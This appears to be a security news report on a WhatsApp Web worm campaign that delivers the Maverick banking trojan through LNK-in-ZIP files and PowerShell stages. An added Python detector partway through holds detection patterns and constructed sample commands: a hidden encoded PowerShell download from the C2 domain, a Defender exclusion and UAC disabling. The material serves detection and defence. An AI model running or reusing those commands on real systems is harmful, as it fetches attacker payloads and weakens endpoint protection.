
    New WhatsApp Worm Campaign Discovered Delivering Banking Malware for Credential Theft

    Security researchers from Dell’s Counter Threat Unit™ (CTU) and Sophos have uncovered an active malware campaign exploiting the WhatsApp Web platform to spread a self-propagating worm that installs Brazilian banking trojans and cryptocurrency credential stealers.

    The campaign, which began on September 29, 2025, primarily targets users in Brazil and leverages deceptive messages and malicious ZIP attachments to compromise victims’ systems.

    The attack starts when victims receive a message from an infected WhatsApp contact containing a ZIP archive, often named to appear as legitimate financial or business documents such as “ORCAMENTO_XXXXXXX.zip” (Budget) or “COMPROVANTE_20251002_XXXXXXX.zip” (Voucher).

    The message claims the file can only be viewed on a computer, encouraging users to open it via WhatsApp Web on desktop devices.

    Inside the ZIP archive is a Windows shortcut (LNK) file that appears to be a document but actually executes a hidden PowerShell command when clicked.

    Infection chain delivering Selenium payload. (Source: Sophos)

    This command uses obfuscated Base64-encoded content to spawn an Explorer process, which downloads a follow-up script from a remote command-and-control (C2) server hosted on hxxps://www.zapgrande[.]com.

    According to Sophos telemetry, similar activity was detected across more than 1,000 endpoints in 400 environments within the first week of the campaign.

    The downloaded second-stage PowerShell script includes comments in Portuguese referring to actions such as disabling User Account Control (UAC) and adding Microsoft Defender exclusions.

    These modifications are intended to weaken endpoint security before downloading additional payloads. In observed cases, the commands enabled the attacker to bypass standard Windows defense mechanisms, ensuring smoother execution of subsequent malware components.

    Two payloads were identified during analysis: a browser automation module using the legitimate Selenium framework with a ChromeDriver instance, and a stealthy .NET-based banking trojan known as Maverick.

    The Selenium component grants attackers remote control of active browser sessions, allowing them to hijack WhatsApp Web sessions and automatically propagate infection links to new targets.

    Meanwhile, Maverick closely monitors browser activity for traffic related to leading Brazilian financial institutions and cryptocurrency exchanges.

    When a target domain is detected, the malware injects a second-stage banking trojan that captures credentials and session data to enable fraudulent transactions.

    Researchers are exploring possible links between Maverick and the earlier Coyote banking trojan, which in 2024–2025 was delivered through malicious LNK files and multi-stage PowerShell infection chains.

    The overlapping techniques, infrastructure, and language artifacts suggest that Maverick could be an evolved version of Coyote optimized for WhatsApp-based propagation.

    Organizations are urged to warn employees against opening ZIP attachments received through messaging platforms and to investigate abnormal PowerShell activity promptly to stop lateral spread.
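As a defender-side illustration of the chain described above (an LNK-launched PowerShell command carrying Base64-encoded content, a second stage that adds Defender exclusions and disables UAC, and the advice to investigate abnormal PowerShell activity), here is an added example that is not code from the researchers or from this article: it decodes -EncodedCommand arguments in constructed process-creation events and flags the combination of signals the report describes. The event fields, the sample command lines and the `$uacKey` variable are assumptions; the only value taken from the report is the C2 domain.

```python
import base64
import re

# Known indicator from the report, kept defanged as published and refanged only for matching.
C2_DOMAINS = {d.replace("[.]", ".") for d in ("www.zapgrande[.]com",)}
ENCODED_ARG = r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{20,})"
# Rules applied to the raw command line plus any decoded -EncodedCommand payload.
RULES = {
    "encoded_command": re.compile(ENCODED_ARG),
    "hidden_window": re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden\b"),
    "defender_exclusion": re.compile(r"(?i)Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)"),
    "uac_disabled": re.compile(r"(?i)\bEnableLUA\b[^;\n]{0,40}?\b0\b"),
}

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or '' if absent or undecodable."""
    m = re.search(ENCODED_ARG, cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_event(event):
    """Return the names of the detections that fire for one process-creation event."""
    text = event["cmdline"] + "\n" + decode_encoded_command(event["cmdline"])
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    if any(domain in text.lower() for domain in C2_DOMAINS):
        hits.append("known_c2_domain")
    # PowerShell spawned by Explorer is what a double-clicked LNK from the ZIP looks like.
    if event["parent"].lower().endswith("explorer.exe") and "powershell" in event["image"].lower():
        hits.append("explorer_spawned_powershell")
    return hits

def triage(events, threshold=2):
    """Return (event id, detections) for events where at least `threshold` detections fire."""
    return [(e["id"], h) for e in events if len(h := analyze_event(e)) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events modelled on the chain described above; not real telemetry.
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -enc " + base64.b64encode("iwr https://www.zapgrande.com".encode("utf-16le")).decode()},
    {"id": "evt-2", "parent": PS, "image": PS,  # $uacKey is an assumed variable name
     "cmdline": r'powershell.exe -c "Add-MpPreference -ExclusionPath C:\Users\Public; '
                r'Set-ItemProperty $uacKey -Name EnableLUA -Value 0"'},
    {"id": "evt-3", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign admin script
]
```

Running `triage(SAMPLE_EVENTS)` flags evt-1 and evt-2; evt-3 carries only the single weak Explorer-parent signal and is left for the threshold to filter out.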

    Indicator Type        Example Value
    C2 Domain             hxxps://www.zapgrande[.]com
    Malicious File Names  ORCAMENTO_XXXXXXX.zip, COMPROVANTE_20251002_XXXXXXX.zip, NEW-20251001_150505-XXX_XXXXXXX.zip
    Payloads              Selenium automation tool, Maverick banking trojan
